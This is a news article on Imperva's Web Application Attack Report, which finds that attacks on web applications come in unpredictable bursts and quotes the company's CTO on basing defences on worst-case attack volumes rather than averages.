Most firms have inadequate web app defences, study shows

Most firms have inadequate defences for web applications, a study has revealed.

The reason is that defences tend to be geared around attack averages, said Amichai Shulman,
chief technology officer at security firm Imperva.

But the latest Imperva Web Application
Attack Report shows half of the attack incidents on 50 web applications monitored over a
six-month period were greater than the average intensity.

"Half the sample attack incidents made up of multiple malicious requests to the web applications
lasted more than the average of 7 minutes, 42 seconds, with some lasting up to 79 minutes" he told
Computer Weekly.

If all that defences are designed to cope with is the average attack incident, he said, half of
the time they will be overwhelmed by attack requests per second that are way above the average.

The research data shows that most of the time very little happens, but every once in a while
there is an outbreak of attacks.

While the average sample web application was hit by attack incidents 33% of the time, some had
to cope with attacks 80% of the time, the study shows.

For this reason, Shulman believes organisations should base their web application defences based
on the worst-case scenario or at least the typical attack in reality rather than the statistical
average.

Imperva's research showed that attack incident history could not be used to predict future
attacks.

"We went through all our attack data trying to find some predictive model, but we are quite
certain there is no predictability," said Shulman. "This means security teams need to be prepared
to mitigate attacks without any advance notice."

The latest research and analysis shows that in addition to basing defences on extreme bursts of
attacks, they should ensure that security procedures and controls are as automated as possible, he
said, because the attack volume is typically too great to deal with manually.

"Organisations should also test their readiness to accommodate bursty threats by simulating
them, which is probably the best way to find out if your defences are adequate," said Shulman.

The study also confirmed that SQL injection remains the most commonly used attack on web
applications.

Other top attack methods include cross-site scripting (XSS), remote file inclusion (RFI) and
local file inclusion (LFI), the report said.

Email Alerts

By submitting my Email address I confirm that I have read and accepted the Terms of Use and Declaration of Consent.

By submitting your personal information, you agree to receive emails regarding relevant products and special offers from TechTarget and its partners. You also agree that your personal information may be transferred and processed in the United States, and that you have read and agree to the Terms of Use and the Privacy Policy.

It can be tempting to stray from the security roadmap security professionals have put in place when data breaches like the Sony and Anthem breaches are all over the news. But experts say it's crucial to stick to the security basics.

The Open Data Platform has arrived, but not all Hadoop vendors are on board. The initiative, aimed at boosting interoperability, formed a backdrop for discussion at the Strata + Hadoop World 2015 conference.